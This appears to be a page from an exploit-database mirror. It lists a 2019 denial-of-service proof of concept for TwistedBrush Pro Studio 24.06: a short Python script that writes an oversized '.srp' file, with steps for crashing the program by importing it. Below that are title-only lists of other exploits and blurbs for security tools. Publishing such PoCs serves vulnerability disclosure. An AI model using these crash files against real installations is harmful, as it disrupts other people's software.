Search for hundreds of thousands of exploits

"TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)"

Author

Exploit author

"Alejandra Sánchez"

Platform

Exploit platform

windows

Release date

Exploit published date

2019-05-14

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
# -*- coding: utf-8 -*-
# Exploit Title: TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)
# Date: 13/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.pixarra.com
# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
# Version: 24.06
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "TwistedBrush_player.py", it will create a new file "sample.srp"
# 2.- Open TwistedBrush Pro Studio
# 3.- Go to 'Record' > 'Script Player...' 
# 4.- Click 'Import' button, select the 'sample.srp' file created and click 'Open' button
# 5.- Crashed

buffer = "\x41" * 500000
f = open ("sample.srp", "w")
f.write(buffer)
f.close()
Release DateTitleTypePlatformAuthor
2020-05-25"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)"remotewindowsMetasploit
2020-05-25"GoldWave - Buffer Overflow (SEH Unicode)"localwindows"Andy Bowden"
2020-05-22"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)"localwindowsGobinathan
2020-05-22"Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Filetto 1.0 - 'FEAT' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation"localwindows"Matteo Malvica"
2020-05-21"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)"localwindows"Xenofon Vassilakopoulos"
2020-05-21"AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)"doswindows"Xenofon Vassilakopoulos"
2020-05-14"Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)"localwindowsgurbanli
Release DateTitleTypePlatformAuthor
2019-11-12"Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path"localwindows"Alejandra Sánchez"
2019-05-27"Pidgin 2.13.0 - Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-23"Terminal Services Manager 3.2.1 - Denial of Service"doswindows"Alejandra Sánchez"
2019-05-23"NetAware 1.20 - 'Share Name' Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-23"NetAware 1.20 - 'Add Block' Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-22"BlueStacks 4.80.0.1060 - Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-20"PCL Converter 2.7 - Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-20"Encrypt PDF 2.3 - Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-20"docPrint Pro 8.0 - Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-17"CEWE Photoshow 6.4.3 - 'Password' Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-17"CEWE Photo Importer 6.4.3 - '.jpg' Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-17"Sandboxie 5.30 - 'Programs Alerts' Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-15"Tomabo MP4 Converter 3.25.22 - Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-14"TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-14"TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-14"TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-14"Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-10"SpotPaltalk 1.1.5 - Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-10"SpotIM 2.2 - Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-09"Lyric Maker 2.0.1.0 - Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-09"Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-05-09"Convert Video jetAudio 8.1.7 - Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-04-16"PCHelpWare V2 1.0.0.5 - 'SC' Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-04-16"PCHelpWare V2 1.0.0.5 - 'Group' Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-04-04"Magic ISO Maker 5.5(build 281) - 'Serial Code' Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-02-28"TransMac 12.3 - Denial of Service (PoC)"doswindows"Alejandra Sánchez"
2019-02-21"Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)"doslinux"Alejandra Sánchez"
2019-02-21"Memu Play 6.0.7 - Privilege Escalation"localwindows"Alejandra Sánchez"
2019-02-18"Realterm Serial Terminal 2.0.0.70 - Local Buffer Overflow (SEH)"doswindows"Alejandra Sánchez"
2019-02-18"Realterm Serial Terminal 2.0.0.70 - Denial of Service"doswindows"Alejandra Sánchez"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46845/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.